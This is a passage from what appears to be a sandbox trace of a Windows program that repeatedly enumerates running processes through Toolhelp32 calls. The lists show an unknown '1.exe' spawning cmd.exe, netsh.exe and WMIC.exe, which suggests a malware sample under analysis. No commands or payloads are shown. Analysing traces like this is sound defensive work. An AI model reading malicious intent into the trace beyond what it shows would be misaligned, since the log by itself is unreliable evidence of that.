dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.398] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.398] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.399] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.400] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.400] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0146.401] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0146.401] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.402] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.403] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.403] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.404] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.405] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.405] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.406] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.407] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.407] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.408] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.408] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.409] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.410] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.410] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.411] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.412] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0146.412] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.413] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0146.413] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0146.414] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0146.415] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0146.415] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.416] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0146.417] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0146.417] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0146.418] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0146.418] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0146.419] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0146.420] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0146.420] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0146.421] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0146.422] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0146.422] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0146.423] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0146.424] Process32NextW (in: hSnapshot=0x304, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0146.424] CloseHandle (hObject=0x304) returned 1 [0146.424] Sleep (dwMilliseconds=0x1f4) [0147.187] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0147.191] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.191] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0147.192] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0147.192] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.193] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0147.194] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0147.194] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0147.195] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0147.196] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0147.196] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0147.197] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0147.197] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.198] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.199] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0147.199] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.200] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.200] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.201] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.202] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.202] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.203] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.204] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.204] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.205] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.206] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0147.206] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.207] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0147.207] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0147.208] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0147.209] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0147.209] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0147.210] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0147.210] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0147.211] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0147.212] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0147.212] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0147.213] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0147.213] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0147.214] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: 